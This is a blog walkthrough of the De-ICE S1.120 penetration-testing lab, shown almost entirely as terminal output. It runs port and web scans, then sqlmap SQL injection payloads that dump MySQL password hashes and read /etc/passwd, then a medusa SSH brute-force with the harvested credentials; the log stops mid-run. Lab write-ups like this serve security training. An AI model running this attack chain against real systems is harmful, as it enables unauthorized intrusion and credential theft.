Monday, January 13, 2014

De-ICE-S1.120-A

root@kali:~# netdiscover

 Currently scanning: 192.168.70.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.1.120   08:00:27:df:b1:1d    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:15:a3:c4    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.1.120
Main [Error   route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open                 ftp[   21]        from 192.168.1.120  ttl 64
TCP open                 ssh[   22]        from 192.168.1.120  ttl 64
TCP open                http[   80]        from 192.168.1.120  ttl 64
TCP open               https[  443]        from 192.168.1.120  ttl 64
TCP open               mysql[ 3306]        from 192.168.1.120  ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x   2 0        0              40 Jan  2  2011 incoming
22/tcp   open  ssh      OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp   open  http     Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp  open  ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after:  2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_IDEA_128_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.1.120

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C

root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).

root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        80
+ Start Time:         2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time:           2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:~# cd /usr/share/dirb

root@kali:/usr/share/dirb# dirb http://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: http://192.168.1.120/phpmyadmin/
==> DIRECTORY: http://192.168.1.120/webalizer/

root@kali:/usr/share/dirb# nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.120
+ Target Hostname:    192.168.1.120
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
                   Ciphers: DHE-RSA-AES256-SHA
                   Issuer:  /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time:         2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb https://192.168.1.120

-----------------
DIRB v2.21   
By The Dark Raver
-----------------

START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592                                                         

---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: https://192.168.1.120/phpmyadmin/
==> DIRECTORY: https://192.168.1.120/webalizer/

index.php

<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>

add_product.php

<form action="insert_products.php" method="POST">

products.php
<form action="products.php" method="GET">

http://192.168.1.120/insert_products.php

product=prod&description=desc&price=1

--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
F�j Host '192.168.1.121' is not allowed to connect to this MySQL server

http://192.168.1.120/phpmyadmin/setup/

http://192.168.1.120/phpmyadmin/Documentation.htm

phpMyAdmin 3.1.3.1 Documentation

http://192.168.1.120/products.php?id=1

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"

...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8867=8867

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'

[*] shutting down at 12:03:24

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs

[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test

Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel                             | interpret        |
+----+------+-----------------------------------+------------------+
| 1  | 1990 | Beauty                            | Ryuichi Sakamoto |
| 4  | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada    |
| 5  | 1997 | Glee                              | Bran Van 3000    |
+----+------+-----------------------------------+------------------+

Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User       | Password                                             |
+------------+------------------------------------------------------+
| aadams     | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen     | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard       | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku)   |
| aharp      | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin    | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321)   |
| amaynard   | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456)   |
| aspears    | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey)   |
| aweiland   | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123)   |
| bbanter    | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
| bphillips  | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins   | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm  | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567)  |
| ccoffee    | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper    | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123)   |
| dgrant     | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese)   |
| djohnson   | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111)   |
| dstevens   | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor   | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling  | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell    | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome)  |
| jalcantar  | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon)  |
| jalvarez   | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666)   |
| jayala     | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael)  |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n)  |
| jduff      | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin  | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons   | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer)   |
| krenfro    | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo)  |
| ktso       | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber    | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez  | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales   | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master)   |
| mbryan     | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper)   |
| mholland   | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader     | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer)   |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan)   |
| myajima    | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345)    |
| qpowers    | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker)   |
| rjacobson  | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel     | *B12289EEF8752AD620294A64A37CD586223AB454 (0)        |
| sgains     | *F491287896471CB21030790BF46865C4A39DE651 (batman)   |
| sjohnson   | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel   | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon)   |
| swarren    | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow)   |
| tdeleon    | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty)   |
| tgoodchap  | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein)  |
| webapp     | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F            |
+------------+------------------------------------------------------+

root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd

root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:

root@kali:~# pico  user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein

root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon (1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1 of 1 complete)
